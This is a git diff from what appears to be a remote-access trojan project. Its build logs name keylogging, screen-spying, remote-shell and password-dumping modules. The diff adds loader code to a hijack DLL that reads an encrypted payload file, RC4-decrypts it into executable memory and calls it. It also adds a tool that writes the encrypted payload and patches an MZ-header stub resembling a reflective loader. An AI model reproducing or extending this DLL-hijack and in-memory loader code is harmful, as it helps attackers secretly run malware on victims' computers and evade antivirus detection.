diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo index 5611911..1909a4e 100644 Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ diff --git a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm deleted file mode 100644 index eaa1bbd..0000000 Binary files a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm and /dev/null differ diff --git a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal deleted file mode 100644 index baa69ae..0000000 Binary files a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal and /dev/null differ diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log index fae17d0..22c6f33 100644 --- a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log +++ b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log @@ -1 +1,41 @@ +f:\myapp\ccremote\bin\server\ccmaindll.lib +f:\myapp\ccremote\bin\server\ccmaindll.exp +f:\myapp\ccremote\bin\server\ccmaindll.ipdb +f:\myapp\ccremote\bin\server\ccmaindll.iobj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch +f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb +f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj +f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj +f:\myapp\ccremote\bin\server\ccmaindll.dll +f:\myapp\ccremote\bin\server\ccmaindll.pdb f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.delete.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog diff --git a/CcMainDll/CcMainDll/Release/CcMainDll.log b/CcMainDll/CcMainDll/Release/CcMainDll.log index a167622..894e063 100644 --- a/CcMainDll/CcMainDll/Release/CcMainDll.log +++ b/CcMainDll/CcMainDll/Release/CcMainDll.log @@ -164,8 +164,6 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVe d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明 f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(256): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 StrCry.cpp f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(8): warning C4018: “<=”: 有符号/无符号不匹配 f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 @@ -174,6 +172,6 @@ LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略 正在生成代码 f:\myapp\ccremote\ccmaindll\ccmaindll\common\regeditopt.cpp(113): warning C4700: 使用了未初始化的局部变量“NameSize” f:\myapp\ccremote\ccmaindll\ccmaindll\common\filemanager.cpp(260): warning C4715: “CFileManager::OpenFile”: 不是所有的控件路径都返回值 - All 381 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + All 377 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 已完成代码的生成 CcMainDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\CcMainDll\..\..\bin\server\CcMainDll.dll diff --git a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log index 1b77ab9..e2f4e21 100644 --- a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log +++ b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log @@ -3,16 +3,19 @@ f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.pdb f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.idb f:\myapp\ccremote\ccmaindll\wsc\debug\pch.obj f:\myapp\ccremote\ccmaindll\wsc\debug\dllmain.obj -f:\myapp\ccremote\bin\hijack\wsc.ilk f:\myapp\ccremote\bin\hijack\wsc.dll +f:\myapp\ccremote\bin\hijack\wsc.ilk f:\myapp\ccremote\bin\hijack\wsc.pdb f:\myapp\ccremote\bin\hijack\wsc.lib f:\myapp\ccremote\bin\hijack\wsc.exp +f:\myapp\ccremote\bin\hijack\wsc.ipdb +f:\myapp\ccremote\bin\hijack\wsc.iobj f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.command.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.read.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.write.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.delete.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.read.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.write.1.tlog f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\wsc.write.1u.tlog diff --git a/CcMainDll/wsc/Debug/wsc.log b/CcMainDll/wsc/Debug/wsc.log index 30edfb5..45dd7cb 100644 --- a/CcMainDll/wsc/Debug/wsc.log +++ b/CcMainDll/wsc/Debug/wsc.log @@ -1,13 +1,15 @@ C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 pch.cpp dllmain.cpp -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换 -f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(108): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4309: “初始化”: 截断常量值 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll diff --git a/CcMainDll/wsc/Release/wsc.Build.CppClean.log b/CcMainDll/wsc/Release/wsc.Build.CppClean.log index feb3b92..f5f911d 100644 --- a/CcMainDll/wsc/Release/wsc.Build.CppClean.log +++ b/CcMainDll/wsc/Release/wsc.Build.CppClean.log @@ -2,16 +2,18 @@ f:\myapp\ccremote\ccmaindll\wsc\release\wsc.pch f:\myapp\ccremote\ccmaindll\wsc\release\vc141.pdb f:\myapp\ccremote\ccmaindll\wsc\release\pch.obj f:\myapp\ccremote\ccmaindll\wsc\release\dllmain.obj -f:\myapp\ccremote\ccmaindll\release\wsc.dll -f:\myapp\ccremote\ccmaindll\release\wsc.pdb -f:\myapp\ccremote\ccmaindll\release\wsc.lib -f:\myapp\ccremote\ccmaindll\release\wsc.exp -f:\myapp\ccremote\ccmaindll\release\wsc.ipdb -f:\myapp\ccremote\ccmaindll\release\wsc.iobj +f:\myapp\ccremote\bin\hijack\wsc.dll +f:\myapp\ccremote\bin\hijack\wsc.pdb +f:\myapp\ccremote\bin\hijack\wsc.lib +f:\myapp\ccremote\bin\hijack\wsc.exp +f:\myapp\ccremote\bin\hijack\wsc.ipdb +f:\myapp\ccremote\bin\hijack\wsc.iobj +f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.command.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.read.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.write.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.delete.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.read.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.write.1.tlog f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\wsc.write.1u.tlog diff --git a/CcMainDll/wsc/Release/wsc.log b/CcMainDll/wsc/Release/wsc.log index d4a13f4..e98bb81 100644 --- a/CcMainDll/wsc/Release/wsc.log +++ b/CcMainDll/wsc/Release/wsc.log @@ -1,16 +1,18 @@ -G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 +C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 pch.cpp dllmain.cpp -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换 -g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(108): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(154): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(155): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(156): warning C4309: “初始化”: 截断常量值 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp 正在生成代码 - All 8 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 已完成代码的生成 - wsc.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll + wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll diff --git a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate index fd0ad53..3f4a20c 100644 --- a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate +++ b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate @@ -1,2 +1,2 @@ #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 -Release|Win32|G:\CcRemote\CcRemote\CcMainDll\| +Release|Win32|F:\myapp\CcRemote\CcMainDll\| diff --git a/CcMainDll/wsc/dllmain.cpp b/CcMainDll/wsc/dllmain.cpp index 4b16d0f..1bfd9fb 100644 --- a/CcMainDll/wsc/dllmain.cpp +++ b/CcMainDll/wsc/dllmain.cpp @@ -1,7 +1,11 @@ // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" +#include #define STR_CRY_LENGTH 0 //加密字符串的长度 +#define SIZE 256 + + char* uncode(char* str) { int len = str[0]; @@ -51,6 +55,94 @@ extern "C" __declspec(dllexport) void eiwqiothhahndna() } +//------------------------------------------------------------ +//加密前的密码表 +// Size : 256 (0x100) +//------------------------------------------------------------ +unsigned char EncryptTable[256] = { 0 }; + +//------------------------------------------------------------ +//加密后的密码表,可用于解密时的校验 +// Size : 256 (0x100) +//------------------------------------------------------------ +unsigned char ChcekTable[256] = { 0 }; + + + +void EncryptFunc(unsigned char *SourceBytes, unsigned char *EncryptBytes, DWORD nLength) +{ + DWORD nOffsetNum = 0, nTargetNum = 0, nLastNum = 0; + unsigned char TargetCode = '\x0', OffsetCode = '\x0', LastCode = '\x0'; + for (DWORD i = 0; i < nLength; i++) + { + //取密码表标志位Code + TargetCode = EncryptBytes[((i + 1) % 0x100)]; + //取偏移Code的偏移 + nOffsetNum = (TargetCode + nOffsetNum) % 0x100; + //取密码表偏移Code + OffsetCode = EncryptBytes[nOffsetNum]; + //交换密码表数值 + EncryptBytes[nOffsetNum % 0x100] = EncryptBytes[((i + 1) % 0x100)]; + EncryptBytes[((i + 1) % 0x100)] = OffsetCode; + //取最终加密Code偏移 + nLastNum = (TargetCode + OffsetCode) % 0x100; + //获取异或用的字符串 + LastCode = EncryptBytes[nLastNum]; + //取被加密的字符,异或 + SourceBytes[i] ^= LastCode; + } + //在此下断观察SourceBytes和CryptData + return; +} + + +FILE * pFile; +long lSize; +unsigned char * buffer; +size_t result; + +bool InitTestReflectiveLoader(char * SelfPath) +{ + // 一个不漏地读入整个文件,只能采用二进制方式打开 + //pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb"); + pFile = fopen(SelfPath, "rb"); + + if (pFile == NULL) + { + fputs("File error", stderr); + //printf("open file fail"); + return false; + } + + // 获取文件大小 + fseek(pFile, 0, SEEK_END); + lSize = ftell(pFile); + rewind(pFile); + + // 分配内存存储整个文件 + buffer = (unsigned char*)VirtualAlloc(NULL, sizeof(char)*lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + if (buffer == NULL) + { + fputs("Memory error", stderr); + //printf("Memory alloc falil"); + return false; + + } + + // 将文件拷贝到buffer中 + result = fread(buffer, 1, lSize, pFile); + if (result != lSize) + { + fputs("Reading error", stderr); + //printf("Load file to memory falil"); + return false; + + } + return true; + +} + /* 为什么C++生成的Dll函数名带有@?如“_Abcd2@4”后面是数字2加@还有个4 _stdcall调用约定的函数会有@,后面的数字表示参数总共所占字节数,这是因为_stdcall函数需要被调用者清空堆栈,所以需要知道参数所占大小 @@ -103,8 +195,31 @@ extern "C" __declspec(dllexport) int __stdcall run(HMODULE hLibModule) memset(pMainDat, 0, Str_Kernel32[STR_CRY_LENGTH]); delete pMainDat; + if (InitTestReflectiveLoader(SelfPath)) { + + + unsigned char * buffers = (unsigned char*)malloc(sizeof(char)*result - SIZE - SIZE); + + memcpy(EncryptTable, buffer, SIZE); + + memcpy(ChcekTable, buffer + SIZE, SIZE); + + memcpy(buffers, buffer + SIZE + SIZE, result - SIZE - SIZE); + + EncryptFunc(buffers, EncryptTable, result - SIZE - SIZE); + + if (memcmp(ChcekTable, EncryptTable, SIZE) == 0) + { + DWORD lpflOldProtect = 0; + VirtualProtect(buffers, result - SIZE - SIZE, PAGE_EXECUTE_READWRITE, &lpflOldProtect); + __asm { + call buffers + } + } + } + + - MessageBoxA(NULL, SelfPath, "test", NULL); return FreeLibrary(hLibModule); diff --git a/CcRemote/.vs/CcRemote/v15/.suo b/CcRemote/.vs/CcRemote/v15/.suo index 8cea8d3..243e30b 100644 Binary files a/CcRemote/.vs/CcRemote/v15/.suo and b/CcRemote/.vs/CcRemote/v15/.suo differ diff --git a/bin/hijack/Cc28256.dat b/bin/hijack/Cc28256.dat new file mode 100644 index 0000000..51ed8dc Binary files /dev/null and b/bin/hijack/Cc28256.dat differ diff --git a/bin/hijack/wsc.dll b/bin/hijack/wsc.dll index 033e081..29a570d 100644 Binary files a/bin/hijack/wsc.dll and b/bin/hijack/wsc.dll differ diff --git a/bin/hijack/wsc.lib b/bin/hijack/wsc.lib index 3756d48..78af932 100644 Binary files a/bin/hijack/wsc.lib and b/bin/hijack/wsc.lib differ diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll index ccad5ee..e8e7613 100644 Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ diff --git a/bin/server/CcMainDll.lib b/bin/server/CcMainDll.lib index 8ba34ae..15c89c4 100644 Binary files a/bin/server/CcMainDll.lib and b/bin/server/CcMainDll.lib differ diff --git a/strCodeTest/.vs/strCodeTest/v15/.suo b/strCodeTest/.vs/strCodeTest/v15/.suo index f100536..61ef4bd 100644 Binary files a/strCodeTest/.vs/strCodeTest/v15/.suo and b/strCodeTest/.vs/strCodeTest/v15/.suo differ diff --git a/strCodeTest/Debug/strCodeTest.exe b/strCodeTest/Debug/strCodeTest.exe index 7f6767f..2f33d5e 100644 Binary files a/strCodeTest/Debug/strCodeTest.exe and b/strCodeTest/Debug/strCodeTest.exe differ diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log index 19cc4a2..beffe4b 100644 --- a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log @@ -1,12 +1 @@ -f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.pdb -f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.idb -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.obj -f:\myapp\ccremote\strcodetest\debug\strcodetest.ilk f:\myapp\ccremote\strcodetest\debug\strcodetest.exe -f:\myapp\ccremote\strcodetest\debug\strcodetest.pdb -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.command.1.tlog -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.read.1.tlog -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.write.1.tlog -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.command.1.tlog -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.read.1.tlog -f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.write.1.tlog diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.log b/strCodeTest/strCodeTest/Debug/strCodeTest.log index bb8d013..4a50dd4 100644 --- a/strCodeTest/strCodeTest/Debug/strCodeTest.log +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.log @@ -1,9 +1,11 @@  strCodeTest.cpp -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(18): warning C4018: “<=”: 有符号/无符号不匹配 -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(20): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(32): warning C4018: “<=”: 有符号/无符号不匹配 -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(34): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(53): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 -g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(119): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据 - strCodeTest.vcxproj -> G:\CcRemote\CcRemote\strCodeTest\Debug\strCodeTest.exe +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(38): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(40): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(52): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(54): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(73): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(139): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(225): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(225): warning C4309: “初始化”: 截断常量值 + strCodeTest.vcxproj -> F:\myapp\CcRemote\strCodeTest\Debug\strCodeTest.exe diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate index 7b55ff4..5bbebeb 100644 --- a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate @@ -1,2 +1,2 @@ #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 -Debug|Win32|G:\CcRemote\CcRemote\strCodeTest\| +Debug|Win32|F:\myapp\CcRemote\strCodeTest\| diff --git a/strCodeTest/strCodeTest/aaa.txt b/strCodeTest/strCodeTest/aaa.txt new file mode 100644 index 0000000..2165521 Binary files /dev/null and b/strCodeTest/strCodeTest/aaa.txt differ diff --git a/strCodeTest/strCodeTest/strCodeTest.cpp b/strCodeTest/strCodeTest/strCodeTest.cpp index a645a5e..1b9a4f3 100644 --- a/strCodeTest/strCodeTest/strCodeTest.cpp +++ b/strCodeTest/strCodeTest/strCodeTest.cpp @@ -8,6 +8,26 @@ #define SIZE 256 + + +bool CreateMyFile(const char* strFilePath, unsigned char *lpBuffer, size_t dwSize) +{ + DWORD dwWritten; + + HANDLE hFile = CreateFile(strFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); + if (hFile != NULL) + { + WriteFile(hFile, (LPCVOID)lpBuffer, dwSize, &dwWritten, NULL); + } + else + { + return false; + } + CloseHandle(hFile); + return true; +} + + char* crycode(char* str) { printf("cry: %s \n", str); @@ -165,18 +185,58 @@ int RC4Test() //加密后EncryptTable会变成ChcekTable,由于加密解密使用的Key一样,因此解密时判断CheckTable一致即可 memcpy(ChcekTable, EncryptTable, 0x100); EncryptFunc(buffer, EncryptTable, result); + + + + unsigned char * buffers = (unsigned char*)malloc(sizeof(char)*result + SIZE + SIZE); + + memcpy(buffers,ChcekTable,SIZE); + + memcpy(buffers + SIZE,EncryptTable,SIZE); + + memcpy(buffers +SIZE + SIZE,buffer,result); + + CreateMyFile(".\\..\\..\\bin\\hijack\\Cc28256.dat", buffers, result + SIZE + SIZE); + //解密 EncryptFunc(buffer, ChcekTable, result); + + free(buffers); - + free(buffer); + return 0; } + +bool ChangeAsmJmpExp() +{ + // .10000000: 4D dec ebp + // .10000001: 5A pop edx + // .10000002: E800000000 call .010000007 --↓1 + // .10000007: 5B 1pop ebx + // .10000008: 52 push edx + // .10000009: 45 inc ebp + // .1000000A: 55 push ebp + // .1000000B: 8BEC mov ebp,esp + // .1000000D: 81C3F9AA0000 add ebx,00000AA29 ; 导出函数的偏移 + // .10000013: FFD3 call ebx + // .10000015: C9 leave + // .10000016: C3 retn ; + char HardCode[] = {0x4D,0x5A,0xE8,0x00,0x00,0x00,0x00,0x5B,0x52,0x45,0x55,0x8B,0xEC,0x81,0xC3,0x29,0xAA,0x00,0x00,0xFF,0xD3,0xC9,0xC3}; + int CodeLen = 0x15; + memcpy(buffer,HardCode,CodeLen); + return true; +} + + int main() { InitEncryptTable(); if (LoaderFile()) { + ChangeAsmJmpExp(); 